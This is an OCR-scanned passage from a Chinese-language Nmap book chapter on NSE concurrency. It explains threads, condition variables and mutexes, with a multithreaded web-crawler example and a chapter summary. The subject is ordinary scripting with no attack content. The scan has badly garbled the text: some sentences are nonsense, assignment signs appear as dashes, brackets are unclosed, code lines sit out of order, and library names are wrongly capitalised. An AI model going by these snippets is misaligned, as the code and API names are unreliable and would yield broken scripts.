TE NSE 中 通过 函数 stdNSE.new_threadOstdNSE 库 文 件 支持 NSE 线程 的 创建 
stdNSE .new_thread (func，argl，arg2，arg3，…) 
这 个 函数 的 第 一 个 参数 func 就 是 一 个 要 在 新 线程 中 执行 的 函数 。 下 面 编写 一 段 脚本 来 创 
建 三 个 线程 ， 并 将 这 三 个 线程 执行 完成 。 


local stdNSE = require "stdNSE" 





o 


function funcl(host, port) … end 
function func2(host, port) … end 


function func3(host, port) … end 
action - function(host, port) 


local threadl 
local thread2 
local thread3 
while true do 
if coroutine.status(threadl) == "dead" and coroutine.status (thread2) 
-- "dead" and 
coroutine.status(thread3) -- "dead" then 
break 
end 
StdNSE.sleep(1) 
end 
end 


在 需要 并 发 执行 网 络 操作 时 ，NSE 的 线程 就 显得 特别 有 用 。NSE 中 支持 使 用 条 件 变量 和 
互 斥 量 来 控制 线程 的 执行 流程 。 


16.4.2 NSE 中 的 条 件 变量 

在 NSE 线程 控制 中 ， 可 以 使 用 条 件 变量 来 控制 脚本 的 执行 流程 。 可 以 使 用 Nmap API 和 
函数 Nmap.condvar() 创建 一 个 条 件 变量 。 

local MyCondVarFn = Nmap.condvar("RnythingExceptBooleanNumberNil") 

函数 Nmap.condvar() 的 参数 可 以 是 除了 nil、 布 尔 类 型 、 数 值 型 以 外 的 任何 类 型 。 对 于 
一 个 条 件 变量 可 以 进行 的 操作 包括 如 下 三 个 。 

口 wait 


StdNSE.new thread(funcl, host, port 
StdNSE.new thread(func2, host, port 
StdNSE.new thread(func3, host, port) 


"ow ow 





O broadcast 

O signal 

这 里 所 有 需要 处 理 的 线程 都 按 顺 序 存 放 在 一 个 等 待 队 列 中 。 当 一 个 线程 调用 wait 函数 之 
可 以 加 入 到 这 个 队列 中 ; 当 队 列 中 的 一 个 线程 调用 signal 函数 之 后 ， 可 以 从 这 个 队列 中 


m 
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释放 出 来 ,然后 恢复 执行 ， 而 broadcast 则 可 以 恢复 所 有 线程 的 执行 。 


local MyCondVar = Nmap.condvar ("GoToFail" 


MyCondVar "wait" 


下 面 是 一 个 Web fet TH, AEAT AKRA BU SEBEMIUS BARE 
了 条 件 变量 实现 ， 最 终 实现 了 对 全 部 URL 的 访问 。 


--Initializes the web crawler. 
--This funcion extracts the initial set of links and 
--creates the subcrawlers that start processing these links. 
--It waits until all the subcrawlers are done before quitting. 
--G8param uri URI string 
--@param settings Options table 
local function init crawler(host, port, uri) 
StdNSE.print debug(1, "$s:[Subcrawler] Crawling URI '$s'", LIB NAME, uri) 
local crawlers num - OPT SUBCRAWLERS NUM 
local co = () 
local condvar = Nmap.condvar (host) 
init registry() 
--For consistency, transform initial URI to absolute form 
if not( is url absolute(uri) ) then 
local abs uri - url.absolute("http://"..stdNSE.get hostname(host), uri) 
StdNSE.print debug(3, "$s:Starting URI '$s' became '$s'", LIB NAME, uri, 
abs uri) 
uri - abs uri 
end 
--Extracts links from given url 
local urls - url extract(host, port, uri 
if furls«-0 then 
StdNSE.print debug(3, "$s:0 links found in $s", LIB NAME, uri) 
Nmap.registry[LIB NAME]["finished"] - true 
return false 
end 
add unvisited uris (urls) 
--Reduce the number of subcrawlers if the initial link list has less 
-- items than the number of subcrawlers 
if tonumber(crawlers num) > #urls then 
crawlers num = £urls 
end 
--Wake subcrawlers 
for i-l,crawlers num do 
StdNSE.print debug(2, "$s:Creating subcrawler f$$d", LIB NAME, i) 
co[i] = stdNSE.new thread(init subcrawler, host, port) 
end 
repeat 
condvar "wait"; 
for i, thread in pairs(co) do 
if coroutine.status(thread) -- "dead" then co[i] - nil end 
end 
until next(co) -- nil; 
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dump visited uris() 
Nmap.registry[LIB NAME] ["finished"] 
Nmap.registry[LIB NAME] ["running"] 


true 
false 


end 


16.4.3 NSE 中 的 互 斥 变量 


互 斥 变量 是 NSE 中 提供 的 一 种 机 制 ， 用 来 避免 多 个 进程 在 同一 时 间 对 同一 个 资源 进行 
操作 。 例 如 ，Nmap 中 的 注册 表 就 是 这 样 的 一 个 资源 ， 如 果 在 同一 时 间 有 多 个 进程 试图 对 其 
进行 修改 ， 就 可 能 会 发 生 错误 。NSE 的 开发 者 也 可 以 利用 互 斥 变量 实现 在 任何 时 刻 只 运行 一 
个 实例 。 

函数 Nmap.mutex() 中 以 一 个 对 象 作为 参数 ， 这 个 对 象 可 以 是 除了 nil、 布 尔 类 型 、 数 值 
型 以 外 的 任何 值 。 下 面 使 用 Nmap.mutex( 来 创建 一 个 互 斥 变量 。 


local Nmap = require "Nmap" 
action = function (host, port 


local Mutex = Nmap.mutex ("MY SCRIPT ID") 
--now we do something with our mutex 
End 


使 用 Nmap.mutex() 创建 的 函数 ， 可 以 使 用 下 面 的 4 个 参数 。 

Q trylock 

Q lock 

O running 

O done 

下 面 的 代码 给 出 了 如 何 使 用 互 斥 变量 来 保证 执行 过 程 中 只 有 一 个 实例 。 


local Nmap = require "Nmap" 
local mutex - Nmap.mutex("AnyStringOrDatatypeExceptForNilNumbersBooleans") 
function run crawler () 


end 
function init() 
if Nmap.registry(SCRIPT NAME].executed--nil then 
run crawler() 
Nmap.registry[SCRIPT NAME].executed - true 
end 
end 
action - function(host, port) 
mutex "lock" 
init() 
mutex "done" 
end 
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这 里 调用 lock 和 done 函数 来 阻止 函数 initO 的 执行 ， 保 证 在 任何 时 刻 只 有 一 个 脚本 的 实 
例 在 运行 。 这 里 同样 还 有 一 个 名 为 trylock 的 函数 尝试 去 锁定 一 个 资源 ， 如 果 这 个 资源 正 被 占 
用 ， 则 这 个 函数 会 立刻 返回 一 个 false 的 值 。 而 另外 一 个 lock 函数 则 不 同 ， 它 将 会 一 直 等 待 
直到 获得 这 个 资源 为 止 。 








小 结 


本 章 中 主要 了 解 了 Nmap 中 的 并 发 执行 机 制 ， 并 系统 讲述 了 在 Lua 语言 和 NSE 中 如 何 
实现 并 发 执行 ， 而 且 给 出 了 一 些 具 体 的 实例 。 通 过 并 发 执行 ， 可 以 更 合理 地 利用 系统 资源 ， 
更 好 地 发 挥 各 种 资源 的 效益 。 





